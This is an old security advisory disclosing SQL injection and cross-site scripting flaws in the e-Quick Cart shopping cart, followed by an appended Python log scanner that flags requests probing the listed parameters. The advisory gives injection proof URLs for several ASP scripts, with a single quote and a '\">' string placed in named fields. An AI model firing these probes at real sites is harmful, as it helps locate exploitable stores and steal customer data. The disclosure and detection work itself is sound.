------------------------------------------------------
Nightmare TeAmZ Advisory 016
------------------------------------------------------
Date - 11/2005
e-Quick Cart SQL & XSS

AFFECTED PRODUCTS
=================
e-Quick Cart
http://www.cdmweb.com

XSS Proof:
==========
www.[host].com/[path]/shopgift.asp?strgifttoname=">
www.[host].com/[path]/shopmaillist.asp?strfirstname=">
www.[host].com/[path]/shopprojectlogin.asp?strpid=">
www.[host].com/[path]/shoptellafriend.asp?Custname=">

SQL Proof:
==========
www.[host].com/[path]/shopaddtocart.asp?quantity=1&Order=Order&productid='
www.[host].com/[path]/shopprojectlogin.asp?strpid=1&strpemail='
www.[host].com/[path]/shoptellafriend.asp??id='

Solution:
=========
No Solution At This Time

Credits
=======
This vulnerability was discovered and researched by BiPi_HaCk of Nightmare TeAmZ
We're: BiPi_HaCk - r3d_4Ss4ult3r - Sub_Z3r0
Site: http://www.NightmareSecurity.net <--IT Security Forum
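With no fix available, a site running e-Quick Cart can at least watch its web logs for requests that put quote or angle-bracket characters into the parameters listed above. The following is an added example, not part of the original advisory: the log field order, the sample lines and the names `WATCHED`, `flag_request` and `scan` are assumptions made for illustration.

```python
import posixpath
from urllib.parse import parse_qsl

# Script -> parameters named in the advisory (lower-cased for matching).
WATCHED = {
    "shopgift.asp": {"strgifttoname"},
    "shopmaillist.asp": {"strfirstname"},
    "shopprojectlogin.asp": {"strpid", "strpemail"},
    "shoptellafriend.asp": {"custname", "id"},
    "shopaddtocart.asp": {"productid"},
}
SUSPICIOUS = set("'\"<>")  # characters the advisory's proof strings rely on

def flag_request(uri_stem, uri_query):
    """Return (param, decoded value) pairs that look like probes of a listed parameter."""
    params = WATCHED.get(posixpath.basename(uri_stem).lower())
    if not params:
        return []
    # The advisory shows "??id=", so drop stray leading '?' before parsing.
    pairs = parse_qsl(uri_query.lstrip("?"), keep_blank_values=True)
    return [(n, v) for n, v in pairs if n.lower() in params and SUSPICIOUS & set(v)]

def scan(lines):
    """Scan log lines (assumed field order below); return (client_ip, stem, hits)."""
    findings = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        hits = flag_request(fields[4], fields[5])
        if hits:
            findings.append((fields[2], fields[4], hits))
    return findings

# Constructed sample log lines (not from the advisory); field order is an assumption.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2005-11-20 10:00:01 192.0.2.10 GET /store/shopgift.asp strgifttoname=%22%3E 200",
    "2005-11-20 10:00:05 192.0.2.10 GET /store/shopaddtocart.asp quantity=1&Order=Order&productid=' 500",
    "2005-11-20 10:00:09 192.0.2.11 GET /store/shopaddtocart.asp quantity=2&Order=Order&productid=17 200",
    "2005-11-20 10:00:12 192.0.2.12 GET /store/shoptellafriend.asp ?id=%27 500",
    "2005-11-20 10:00:15 192.0.2.13 GET /store/default.asp - 200",
]

if __name__ == "__main__":
    for ip, stem, hits in scan(SAMPLE_LOG):
        print(ip, stem, hits)
```

Free-text fields such as `strfirstname` can legitimately contain an apostrophe, so hits on those parameters need review rather than automatic blocking.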